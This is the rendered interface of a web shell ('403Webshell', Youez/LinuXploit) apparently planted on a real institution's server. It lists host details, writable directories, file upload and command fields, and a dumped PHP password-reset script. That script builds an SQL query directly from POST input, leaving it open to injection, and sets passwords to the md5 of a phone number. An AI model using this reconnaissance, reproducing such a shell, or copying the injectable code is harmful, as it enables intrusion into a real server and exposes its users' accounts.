403Webshell
Server IP : 172.64.80.1  /  Your IP : 108.162.241.66
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_entranceForm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_entranceForm/forgotPassword_process.php
<?php
extract($_POST);
require_once('../connect.php');
$db = db_connect();
$result = $db->query("select * from ace_entrancetable where gsm='$gsm' and surname='$surname'");
$num = $result->rowCount();
$result_fetch=$result->fetch(PDO::FETCH_BOTH);
$transID=$result_fetch['transID'];
    if ($num > 0) {
        $gsm1=$gsm;
        $gsm=md5($gsm);
        $aspoaPassword=$db->prepare("UPDATE `fedpoly`.`ace_entrancetable` SET `password` = ? WHERE `ace_entrancetable`.`transID` =?");
       $k= $aspoaPassword->execute([$gsm,$transID]);
//        $k=$db->query("UPDATE `fedpoly`.`ace_entrancetable` SET `password` = '$gsm' WHERE `gsm` ='$gsm1'");
        if ($k) {
          header("location:forgotPassword.php?id=$transID");
            echo $gsm;
            echo $transID;
        }else{
            header("location:forgotPassword.php?id='2'");
        }
    } else {
        header('location:' . 'forgotPassword.php?id=1');
    }

ob_end_flush();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit